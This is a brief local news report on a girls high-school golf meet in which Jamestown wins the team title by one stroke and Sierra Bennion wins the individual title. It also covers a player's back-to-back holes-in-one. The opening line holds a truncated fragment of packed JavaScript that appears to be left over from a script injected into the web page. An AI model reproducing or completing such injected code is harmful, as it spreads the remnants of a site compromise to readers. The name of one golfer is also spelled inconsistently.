JAMESTOWN sebei|var|u0026u|referrer|ennta||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – Drama at Riverwood. That’s the only way to describe the finish of this year’s WDA girls golf meet. Jamestown claimed the team title by one shot and Sierra Bennion won the individual title by the same margin.

Jamestown carded a 322 with Bismarck finishing at 323.

Bennion entered the 18th hole tied with Bismarck High’s Katie Casper and knocked in a six-footer for birdie and the win. Casper missed her own six-footer for birdie. Kasper and Bennion played extra holes in the 2014 WDA tournament, which was won by Kasper.

We can’t forget about the heroics from Blue Jay junior Sarah Azure either. Azure aced the par-3 12th on Monday during the practice and she did it again during play on Tuesday. Back-t0-back holes-in-one with the same club.
